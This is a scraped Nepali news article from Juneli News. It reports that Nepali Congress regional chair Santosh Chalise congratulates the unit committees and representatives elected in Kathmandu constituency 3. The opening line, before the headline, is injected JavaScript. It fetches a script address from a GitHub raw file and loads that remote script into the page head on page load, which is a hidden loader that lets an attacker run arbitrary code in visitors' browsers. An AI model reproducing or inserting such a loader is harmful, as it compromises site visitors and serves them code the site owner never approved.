;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); क्षेत्रीय सभापति सन्तोष चालिसेले सबै इकाइ कार्यसमिति र क्षेत्रीय प्रतिनिधिलाई बधाई दिएका छन् – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • क्षेत्रीय सभापति सन्तोष चालिसेले सबै इकाइ कार्यसमिति र क्षेत्रीय प्रतिनिधिलाई बधाई दिएका छन्
गोकर्नेश्वोर बिशेष

क्षेत्रीय सभापति सन्तोष चालिसेले सबै इकाइ कार्यसमिति र क्षेत्रीय प्रतिनिधिलाई बधाई दिएका छन्

जुनेली न्युज, काठमाडौँ | नेपालि काँग्रेस काठमाडौँ क्षेत्र नं ३ का क्षेत्रीय सभापति सन्तोष चालिसेले १४ औ महाधिबेशन बाट निर्बाचित सबै इकाइ सभापति, इकाइ कार्यसमिति र क्षेत्रीय प्रतिनिधिहरुलाई बधाई साथै कार्य सफलताको शुभकामना समेत दिएका छन् |

काठमाडौँ क्षेत्र नं ३ को सबै वडाको चुनाब अशोज ५  गते भएको थियो भने केहि वडाको असहामितिका कारण ढिला समेत भएको थियो | जम्मा १३ वटा वडा मध्यमा ४ वडामा बिबादका कारण चुनाब भयो भने बाकी सबै वडामा सर्वसहमति भएको थियो |

अव बाकि रहेका नगरपालिका, प्रदेश र क्षेत्रको अधिबेशन पनि यथासक्य सहमतिमा गर्नु पर्ने सन्तोष चालिसेको भनाइ छ |

फेसबुक प्रतिक्रियाहरु